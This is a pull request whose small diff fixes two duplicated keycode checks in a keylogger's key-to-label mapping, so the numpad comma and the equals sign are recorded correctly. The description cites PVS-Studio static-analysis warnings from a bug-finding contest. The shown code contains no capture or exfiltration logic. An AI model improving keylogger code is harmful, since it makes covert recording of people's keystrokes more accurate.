### PR TITLE
fixed from PVS-Studio

### DIFF
--- a/Lilith/keylogger.cpp
+++ b/Lilith/keylogger.cpp
@@ -108,7 +108,7 @@ void Keylogger::logger()		//keycode map taken from https://github.com/TheFox/key
 				out = "[NUM +]";
 			else if (c == 109)
 				out = "[NUM -]";
-			else if (c == 109)
+			else if (c == 110)
 				out = "[NUM ,]";
 			else if (c >= 112 && c <= 123)
 				out = "[F" + std::to_string(c - 111) + "]";
@@ -120,7 +120,7 @@ void Keylogger::logger()		//keycode map taken from https://github.com/TheFox/key
 				out = "[AE]";
 			else if (c == 186)
 				out = "[UE]";
-			else if (c == 186)
+			else if (c == 187)
 				out = "+";
 			else if (c == 188)
 				out = ",";


### PR DESCRIPTION
I'm a member of the Pinguem.ru competition on finding errors in open source projects. A bug, found using PVS-Studio.

Your code has wrong keycodes checking while keylogging.
For example, if user presses comma [,] on numpad, it will log as user pressed minus [-].
And if user presses equal sign [=], it will log as user pressed semicolon [:].
I have corrected keycodes. 

[V517](https://www.viva64.com/en/w/v517/) The use of 'if (A) {...} else if (A) {...}' pattern was detected. There is a probability of logical error presence. Check lines: 121, 123. keylogger.cpp 121
[V517](https://www.viva64.com/en/w/v517/) The use of 'if (A) {...} else if (A) {...}' pattern was detected. There is a probability of logical error presence. Check lines: 109, 111. keylogger.cpp 109
